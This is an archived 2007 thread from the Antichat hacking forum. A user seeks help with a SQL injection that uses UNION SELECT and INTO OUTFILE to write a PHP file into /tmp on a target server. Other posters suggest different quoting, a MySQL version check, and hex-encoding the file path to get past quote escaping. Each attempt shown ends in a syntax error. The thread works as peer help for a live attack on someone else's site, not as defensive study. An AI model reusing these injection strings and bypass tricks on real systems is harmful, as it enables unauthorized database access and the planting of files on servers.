Форум АНТИЧАТ - Need help SQL inj

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Need help SQL inj (https://forum.antichat.xyz/showthread.php?t=54327)

ExceLenT

24.11.2007 20:46

Need help SQL inj

Вобщем при вводе такова кода в строку

Код:

-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,0x66726f6d205b2063617368205d207768697468206c6f7665202929292929,null,null,null,null+from+users+into+outfile(char(39)+/tmp/aa.php+char(39))/*

пишется

Код:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(char(39) /tmp/aa.php char(39))/*' at line 1

пробовал разные варианты, в чём суть то ошибки ?

blackybr

24.11.2007 20:52

+into+outfile+'/tmp/aa.php'/*

ExceLenT

24.11.2007 21:22

Цитата:

Сообщение от blackybr

+into+outfile+'/tmp/aa.php'/*

Получил

Код:

the right syntax to use near '\'/tmp/aa.php\'/*' at line 1

Scipio

24.11.2007 21:28

не выйдет у тебя эта фигня, кавычки экранируются, в into outfile это не как не обойдешь
никакими чарами, никакими хексами

Spyder

24.11.2007 22:54

версию узнай
если >5 то можешь через хекс обойти

ExceLenT

25.11.2007 15:21

Цитата:

Сообщение от Spyder

версию узнай
если >5 то можешь через хекс обойти

Как ?

Код:

5.0.38-Ubuntu_0ubuntu1

.Slip

25.11.2007 15:23

Цитата:

Сообщение от ExceLenT

Как ?

Код:

5.0.38-Ubuntu_0ubuntu1

/tmp/aa.php ==> 0x2f746d702f61612e706870
into+outfile+0x2f746d702f61612e706870

ExceLenT

25.11.2007 15:29

Нифига

Код:

the right syntax to use near '0x2f746d702f61612e706870' at line 1

Время: 01:23